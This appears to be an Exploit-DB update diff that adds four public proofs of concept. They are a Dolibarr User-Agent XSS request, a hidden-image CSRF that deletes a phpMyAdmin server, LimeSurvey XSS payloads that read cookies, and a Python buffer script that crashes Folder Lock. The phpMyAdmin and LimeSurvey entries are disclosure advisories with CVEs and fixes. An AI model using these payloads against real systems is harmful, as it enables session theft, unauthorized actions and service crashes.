DB: 2019-09-14

4 changes to exploits/shellcodes

Folder Lock 7.7.9 - Denial of Service
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
LimeSurvey 3.17.13 - Cross-Site Scripting

exploits/php/webapps/47384.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
+Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# CVE: CVE-2019-16197
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
+the User-Agent HTTP header is copied into the HTML document as plain text
+between tags, leading to XSS.
+
+GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

exploits/php/webapps/47385.txt

@@ -0,0 +1,79 @@
+=============================================
+MGC ALERT 2019-003
+- Original release date: June 13, 2019
+- Last revised:  September 13, 2019
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,3/10 (CVSS Base Score)
+- CVE-ID: CVE-2019-12922
+=============================================
+
+I. VULNERABILITY
+-------------------------
+phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
+
+II. BACKGROUND
+-------------------------
+phpMyAdmin is a free software tool written in PHP, intended to handle the
+administration of MySQL over the Web. phpMyAdmin supports a wide range of
+operations on MySQL and MariaDB.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
+an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
+server in the Setup page.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Exploit CSRF - Deleting main server
+
+<p>Deleting Server 1</p>
+<img src="
+http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
+style="display:none;" />
+
+V. BUSINESS IMPACT
+-------------------------
+The attacker can easily create a fake hyperlink containing the request that
+wants to execute on behalf the user,in this way making possible a CSRF
+attack due to the wrong use of HTTP method.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+phpMyAdmin <= 4.9.0.1
+
+VII. SOLUTION
+-------------------------
+Implement in each call the validation of the token variable, as already
+done in other phpMyAdmin requests.
+
+VIII. REFERENCES
+-------------------------
+https://www.phpmyadmin.net/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+June 13, 2019 1: Initial release
+September 13, 2019 2: Last revision
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
+June 13, 2019 2: Send to vendor
+July 16, 2019 3: New request to vendor without fix date
+September 13, 2019 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

exploits/php/webapps/47386.txt

@@ -0,0 +1,146 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
+=======================================================================
+              title: Stored and reflected XSS vulnerabilities
+            product: LimeSurvey
+ vulnerable version: <= 3.17.13
+      fixed version: =>3.17.14
+         CVE number: CVE-2019-16172, CVE-2019-16173
+             impact: medium
+           homepage: https://www.limesurvey.org/
+              found: 2019-08-23
+                 by: Andreas Kolbeck (Office Munich)
+                     David Haintz (Office Vienna)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"LimeSurvey is the tool to use for your online surveys. Whether you are
+conducting simple questionnaires with just a couple of questions or advanced
+assessments with conditionals and quota management, LimeSurvey has got you
+covered. LimeSurvey is 100% open source and will always be transparently developed.
+We can help you reach your goals."
+
+Source: https://www.limesurvey.org/
+
+
+Business recommendation:
+------------------------
+LimeSurvey suffered from a vulnerability due to improper input
+and output validation. By exploiting this vulnerability an attacker could:
+    1. Attack other users of the web application with JavaScript code,
+       browser exploits or Trojan horses, or
+    2. perform unauthorized actions in the name of another logged-in user.
+
+The vendor provides a patch which should be installed immediately.
+Furthermore, a thorough security analysis is highly recommended as only a
+short spot check has been performed and additional issues are to be expected.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Stored and reflected XSS vulnerabilities
+LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
+which allows an attacker to execute JavaScript code with the permissions of the victim.
+In this way it is possible to escalate privileges from a low-privileged account e.g.
+to "SuperAdmin".
+
+
+Proof of concept:
+-----------------
+1) Stored and reflected XSS vulnerabilities
+Example 1 - Stored XSS (CVE-2019-16172):
+The attacker needs the appropriate permissions in order to create new survey groups.
+Then create a survey group with a JavaScript payload in the title, for example:
+
+test<svg/onload=alert(document.cookie)>
+
+When the survey group is being deleted, e.g. by an administrative user, the JavaScript
+code will be executed as part of the "success" message.
+
+
+Example 2 - Reflected XSS (CVE-2019-16173):
+The following proof of concept prints the current CSRF token cookie which contains the
+CSRF token. The parameter "surveyid" is not filtered properly:
+
+http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
+src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
+
+
+If the URL schema is configured differently the following payload works:
+http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
+xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in version 3.17.9 and the latest
+version 3.17.13. It is assumed that older versions are affected as well.
+
+
+Vendor contact timeline:
+------------------------
+2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
+2019-09-02: Fixes available:
+            https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
+            https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
+2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
+2019-09-03: Release of LimeSurvey v3.17.15 bug fix
+2019-09-12: Coordinated release of security advisory
+
+
+Solution:
+---------
+Update to version 3.17.15 or higher:
+https://www.limesurvey.org/stable-release
+
+The vendor provides a detailed list of changes here:
+https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
+
+
+Workaround:
+-----------
+No workaround available.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF A. Kolbeck / @2019

exploits/windows/dos/47383.py

@@ -0,0 +1,28 @@
+# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
+# Date: 12.09.2019
+# Vendor Homepage:https://www.newsoftwares.net/folderlock/
+# Software Link:  https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
+# Exploit Author: Achilles
+# Tested Version: 7.7.9
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :Folder_Lock.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Folderlock and Click 'Enter Key'
+# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
+# 5.- Click 'Submit' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

files_exploits.csv

@@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port
 47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
+47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port
 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
 47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
 47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
+47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
+47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
+47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80